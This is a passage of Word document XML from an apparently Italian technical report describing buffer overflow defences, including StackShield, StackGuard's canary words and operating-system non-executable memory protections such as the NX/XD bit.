        <w:t xml:space="preserve"> memorizzandone una copia in una zona sicura non sovrascrivibile (all'inizio del segmento dati) all'inizio di ogni chiamata di funzione, copia che viene poi confrontata al termine dell'esecuzione della funzione con il valore memorizzato nello stack: se i valori non combaciano </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00736880">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>StackShield</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00736880">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> può terminare l'esecuzione del programma o tentare di proseguire ignorando l'attacco e rischiando al massimo il crash del programma.</w:t>
      </w:r>
      <w:r w:rsidRPr="00736880">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C775DA5" w14:textId="17F6BF70" w:rsidR="00736880" w:rsidRPr="00736880" w:rsidRDefault="00736880" w:rsidP="00736880">
      <w:pPr>
        <w:pStyle w:val="NormaleWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="120" w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00736880">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Un'altra estensione del compilatore </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00736880">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>gcc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00736880">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00736880">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>StackGuard</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00736880">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>", consente sia la rivelazione di eventuali </w:t>
      </w:r>
      <w:r w:rsidRPr="00736880">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>stack buffer</w:t>
      </w:r>
      <w:r w:rsidRPr="00736880">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> overflow sia la prevenzione degli stessi: la prima </w:t>
      </w:r>
      <w:r w:rsidR="008C1448" w:rsidRPr="00736880">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>difesa, tuttavia,</w:t>
      </w:r>
      <w:r w:rsidRPr="00736880">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> risulta molto più efficiente e portabile della seconda, in generale meno affidabile e sicura. La rivelazione si basa sulla scrittura nello </w:t>
      </w:r>
      <w:r w:rsidRPr="00736880">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>stack frame</w:t>
      </w:r>
      <w:r w:rsidRPr="00736880">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t> di una </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00736880">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>canary</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00736880">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00736880">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>word</w:t>
      </w:r>
      <w:r w:rsidRPr="00736880">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t> fra le variabili locali e il </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00736880">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00736880">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00736880">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>address</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00736880">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> memorizzato e sull'assunto che non sia possibile </w:t>
      </w:r>
      <w:r w:rsidRPr="00736880">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>sovrascrivere il RA senza alterare la </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00736880">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>canary</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00736880">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> word</w:t>
      </w:r>
      <w:r w:rsidRPr="00736880">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, che prende quindi questo nome proprio in analogia all'uso dei canarini nelle miniere di carbone come primo sistema di allarme. Prima di restituire il controllo all'istruzione puntata dal RA, si controlla se la </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00736880">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>canary</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00736880">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> word</w:t>
      </w:r>
      <w:r w:rsidRPr="00736880">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ha subito alterazioni: eventuali modifiche vengono considerate come un potenziale tentativo di alterare il controllo dell'esecuzione del programma e quindi di attacco. La tecnica adottata da </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00736880">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>StackGuard</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00736880">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> è efficace solo se l'attaccante non è in grado di prevedere la </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00736880">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>canary</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00736880">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> word</w:t>
      </w:r>
      <w:r w:rsidRPr="00736880">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, in questo caso sarebbe infatti in grado di progettare l'overflow in modo da sovrascrivere la </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00736880">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>canary</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00736880">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> word</w:t>
      </w:r>
      <w:r w:rsidRPr="00736880">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> con il suo valore originale: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00736880">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>StackGuard</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00736880">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> a questo scopo esegue la randomizzazione del </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00736880">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>canary</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00736880">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7023B4D4" w14:textId="77777777" w:rsidR="00736880" w:rsidRPr="008C1448" w:rsidRDefault="00736880" w:rsidP="003441B6">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="_Toc76047779"/>
      <w:r w:rsidRPr="008C1448">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>5.</w:t>
      </w:r>
      <w:r w:rsidRPr="008C1448">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="008C1448">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008C1448">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Difesa a livello di </w:t>
      </w:r>
      <w:r w:rsidRPr="008C1448">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>sistema operativo</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p w14:paraId="0CCCE615" w14:textId="0E5864E7" w:rsidR="00736880" w:rsidRPr="00736880" w:rsidRDefault="00736880" w:rsidP="00736880">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="0070C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00736880">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="202122"/>
        </w:rPr>
        <w:t>Molti sistemi operativi hanno tentato di rispondere al problema del buffer overflow imponendo delle restrizioni sull'uso della memoria e rendendo quindi più complessi gli attacchi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA36B27" w14:textId="65C64EDB" w:rsidR="00736880" w:rsidRPr="00736880" w:rsidRDefault="00736880" w:rsidP="00736880">
      <w:pPr>
        <w:pStyle w:val="NormaleWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="120" w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00736880">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Un meccanismo di difesa a livello di sistema operativo molto diffuso si basa sul rendere certe pagine di memoria, come quelle contenenti </w:t>
      </w:r>
      <w:r w:rsidRPr="00736880">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>stack</w:t>
      </w:r>
      <w:r w:rsidRPr="00736880">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t> e </w:t>
      </w:r>
      <w:r w:rsidRPr="00736880">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>heap</w:t>
      </w:r>
      <w:r w:rsidRPr="00736880">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, non eseguibili: ogni tentativo di trasferire il controllo dell'esecuzione a codice all'interno di queste aree solleva quindi un'eccezione, impedendone l'esecuzione. Ciò può essere realizzato sfruttando certe funzionalità hardware dei processori note come "NX" ("No </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00736880">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>eXecute</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00736880">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>") bit o "XD" ("</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00736880">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>eXecute</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00736880">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00736880">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Disabled</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00736880">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>") bit, oppure tramite tecniche software che emulano questo funzionamento.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5C4143" w14:textId="0A67736F" w:rsidR="00736880" w:rsidRPr="00736880" w:rsidRDefault="00736880" w:rsidP="00736880">
      <w:pPr>
        <w:pStyle w:val="NormaleWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="120" w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00736880">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Alcuni sistemi operativi basati su UNIX come </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00736880">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>OpenBSD</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00736880">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t> e OS X supportano direttamente lo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00736880">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>executable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00736880">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00736880">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>space</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00736880">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00736880">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>protection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00736880">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00736880">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00736880">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Le versioni più recenti di </w:t>
      </w:r>
      <w:r w:rsidRPr="00736880">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
